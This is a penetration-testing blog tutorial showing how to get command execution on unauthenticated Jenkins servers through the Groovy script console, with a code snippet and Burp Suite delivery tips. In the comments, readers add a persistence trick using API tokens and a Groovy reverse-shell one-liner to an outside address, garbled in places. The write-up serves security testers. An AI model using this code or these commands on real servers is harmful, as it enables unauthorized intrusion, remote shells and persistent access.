Hacking Jenkins Servers With No Password

Hacking Jenkins Servers With No Password

Author: Royce Davis Posted In Penetration Testing Tutorials On: 2014/06/13 Comments: 10
Hacking Jenkins Servers With No Password

Here’s a fun Jenkins trick I have been using on some recent Information Security Assessments to gain an initial foothold. If you aren’t familiar with hacking Jenkins servers, it runs by default on port 8080 and also by default it has no password (Hurray!). According to their Wiki: “Jenkins is an award-winning application that monitors executions of repeated jobs, such as building a software project or jobs run by cron.” Here is what Jenkins looks like.

Screen Shot 2014-06-13 at 9.20.15 AM

This is some Groovy script right here – Jenkins

Jenkins Groovy Script Console
Conveniently, Jenkins has a native interpreter for the “Groovy Script” language which it selflessly offers up to you via the “/script” directory. Click on the “Manage Jenkins” link in the left-hand navigation pane and then “Script Console” from the main menu. Here is what Jenkins gives you.

Hacking Jenkins Free Video

Hacking Jenkins Video

Lets have some fun – Jenkins

Now, if you’re like me and you haven’t even heard of Groovy Script much less know how to write in it, you’re in luck because it is in fact 2014 and we all have smart phones with unlimited access to the all powerful Google Machine! Click on a few links here and there skim through a few paragraphs and you’ll see that we can use Jenkins to execute some Groovy operating system commands with the following:

Stolen From Stackoverflow

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

This doesn’t appear overly complex but for the sake of completeness lets walk through it:

  • 1. We declare two objects of type “StringBuffer”. ‘sout’ and ‘serr’
  • 2. Next we store the result of running the .execute() method on a string which should be a valid os command in the variable ‘proc’
  • 3. Grab the process output using the .consumeProcessOutput() method passing in our two string buffers as per the method definition
  • 4. This line just sets a timeout counter that will kill the process if it doesn’t finish on its own
  • 5. Finally we print the process output and any errors that were generated

Cool, so that should be easy enough lets use Jenkins to paste that into our console window and run some OS commands. All we need to do is substitute “[INSERT COMMAND]” with what we want to run. We’ll start with a simple “dir” command.

Jenkins Error Message

Damn! (shouted with an English accent for added flare) we got an error. Alright lets work this out. The error says “Cannot run program “dir”: CreateProcess error=2, The system cannot find the file specified…” Well that makes sense “dir” isn’t a file on the target system it is a component to cmd.exe. Lets tell Jenkins to run that instead.

Jenkins Code Execution

Getting closer. So from the looks of it dGroovy Script just spawned an instance of cmd.exe however we can’t interact with it. So lets try passing a command via the /C parameter. “cmd.exe /c dir” should do the trick I think.

Jenkins Code Execution

Executing Groovy Script Through Burp Suite- Jenkins

It may be necessary to feed your payload through an interception proxy like Burp Suite. This is extremely straight forward. Simply send a POST request to ‘/script’ and include the necessary parameters. Make sure to URL encode your script so it executes. Here is an example which should show you everything you need.

Conclusion – Jenkins

So there you have it. A simple, one line at a time command execution gateway. A valuable find when Penetration Testing. Surely you can think of creative ways to turn this access into something bigger and better like a Meterpreter shell, I’ll leave that piece up to you. Also, its worth noting that there is a Metasploit module for this already. I have yet to be successful with it but you might have different results so be sure to check it out. Jenkins Script-Console Java Execution Thank you for reading and as always, hack responsibly!

Jenkins – Related Reading


Share this article

Facebooktwittergoogle_plusredditpinterestlinkedinmailFacebooktwittergoogle_plusredditpinterestlinkedinmail
10 Comments
  • Also, if you hit /scriptText instead of /script you can strip away all of the HTML output from the browser version, which makes it nice and scriptable with curl :)

    Jenkins uses basic auth, so curl will take -u username:password ORRRR -u username:apitoken. The apitoken will survive a password rotation, so it’s a sneaky way to maintain persistence.

  • you wouldn’t happen to be able to provide the http request for a any of groovy scripts mentioned above would you? I’m trying to do this via burp repeater but can’t figure out the post format to include a multi line script

    • Hi Jeff,

      This is easy to accomplish. I have updated the article with a brief explanation and screenshot example. Hopefully that helps!

  • Below provides a nice reverse bash for linux hosts from the Jenkins script console, taken from pentestmonkey.

    r = Runtime.getRuntime()
    p = r.exec([“/bin/bash”,”-c”,”exec 5/dev/tcp/10.0.0.0/8080;cat &5 >&5; done”] as String[])
    p.waitFor()

  • Leave a Reply

    Your email address will not be published. Required fields are marked *

    This site uses Akismet to reduce spam. Learn how your comment data is processed.

    Share This

    Recent Posts

    Subscribe To Our Mailing List

    Become a Web App Penetration Tester

    Penetration Testing

    Categories

    Metasploit

    Web Application Hacking


    Copyright 2018

    css.php

    Are You Using the Top 5 Pentest Tools?

    Enter your email address to download your copy of our FREE e-book and find out now!

    Thank you, now go check your email!!